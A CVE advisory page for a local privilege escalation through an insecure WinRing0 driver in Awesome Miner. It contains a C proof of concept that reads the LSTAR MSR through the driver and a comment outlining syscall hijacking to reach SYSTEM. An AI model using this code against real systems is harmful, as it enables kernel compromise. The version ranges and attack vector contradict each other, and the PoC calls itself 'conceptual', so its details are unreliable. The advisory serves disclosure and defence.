Security Vulnerability Report
CVE-2025-63602 CVSS 7.3 HIGH

CVE-2025-63602

Published: 2025-11-18 16:15:46
Last Modified: 2025-12-31 02:24:57

Description

A vulnerability was discovered in Awesome Miner thru 11.2.4 that allows arbitrary read and write to kernel memory and MSRs (such as LSTAR) as an unprivileged user. This is due to the implementation of an insecure version of WinRing0 (1.2.0.5, renamed to IntelliBreeze.Maintenance.Service.sys) that lacks a properly secured DACL, allowing unprivileged users to interact with the driver and, as a result, the kernel. This can result in local privilege escalation, information disclosure, denial of service, and other unspecified impacts.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:awesomeminer:awesome_miner:11.2.4:*:*:*:*:*:*:* - VULNERABLE
Awesome Miner < 11.2.4
WinRing0 (IntelliBreeze.Maintenance.Service.sys) < 1.2.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-63602 Proof of Concept
 * Target: Awesome Miner thru 11.2.4 (IntelliBreeze.Maintenance.Service.sys)
 * Type: Local Privilege Escalation via Insecure WinRing0 Driver
 * Note: This is a conceptual PoC for educational and security research purposes only.
 */
#include <windows.h>
#include <stdio.h>

#define IOCTL_READ_MSR  0x9C402408
#define IOCTL_WRITE_MSR 0x9C40240C
#define IOCTL_READ_MEM  0x9C402400
#define IOCTL_WRITE_MEM 0x9C402404

// MSR addresses
#define MSR_LSTAR 0xC0000082

int main(void)
{
    HANDLE hDevice;
    DWORD bytesReturned;
    DWORD inputBuffer[2];
    ULONGLONG outputBuffer;   // MSRs are 64-bit wide, so the output buffer must be too
    BOOL result;

    printf("[*] CVE-2025-63602 PoC - Awesome Miner LPE\n");
    printf("[*] Opening driver handle...\n");

    // Open handle to vulnerable driver
    hDevice = CreateFileA(
        "\\\\.\\IntelliBreezeMaintenanceService",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open driver handle. Error: %lu\n", GetLastError());
        return 1;
    }
    printf("[+] Driver handle opened successfully\n");
    printf("[*] Reading LSTAR MSR (0xC0000082)...\n");

    // Read LSTAR MSR to demonstrate arbitrary MSR access
    inputBuffer[0] = MSR_LSTAR;
    inputBuffer[1] = 0;
    result = DeviceIoControl(
        hDevice,
        IOCTL_READ_MSR,
        inputBuffer,
        sizeof(inputBuffer),
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned,
        NULL
    );
    if (result) {
        printf("[+] LSTAR MSR value: 0x%llX\n", outputBuffer);
        printf("[!] Successfully read kernel MSR as unprivileged user!\n");
        printf("[*] This demonstrates the vulnerability - arbitrary MSR access.\n");
        printf("[*] An attacker could write to this MSR to hijack syscalls.\n");
    } else {
        printf("[-] Failed to read MSR. Error: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

/*
 * Attack Scenario:
 * 1. Attacker with low-privilege access opens handle to IntelliBreeze.Maintenance.Service.sys
 * 2. Uses IOCTL interface to read/write MSR registers (e.g., LSTAR)
 * 3. Modifies LSTAR to point to malicious code location
 * 4. Triggers a syscall to execute attacker-controlled code in kernel mode
 * 5. Escalates privileges to SYSTEM
 */

References

https://dreadsec.co/p/cve-2025-63602-hijacking-system-calls-with-a-popular-crypto-miner.html (Exploit, Third Party Advisory)
https://www.awesomeminer.com/download (Product)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63602",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T16:15:45.593",
    "lastModified": "2025-12-31T02:24:57.383",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was discovered in Awesome Miner thru 11.2.4 that allows arbitrary read and write to kernel memory and MSRs (such as LSTAR) as an unprivileged user. This is due to the implementation of an insecure version of WinRing0 (1.2.0.5, renamed to IntelliBreeze.Maintenance.Service.sys) that lacks a properly secured DACL, allowing unprivileged users to interact with the driver and, as a result, the kernel. This can result in local privilege escalation, information disclosure, denial of service, and other unspecified impacts."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-126"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:awesomeminer:awesome_miner:11.2.4:*:*:*:*:*:*:*",
                "matchCriteriaId": "918D856C-EE5E-4B5F-AB6C-8401754C2208"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://dreadsec.co/p/cve-2025-63602-hijacking-system-calls-with-a-popular-crypto-miner.html",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.awesomeminer.com/download",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}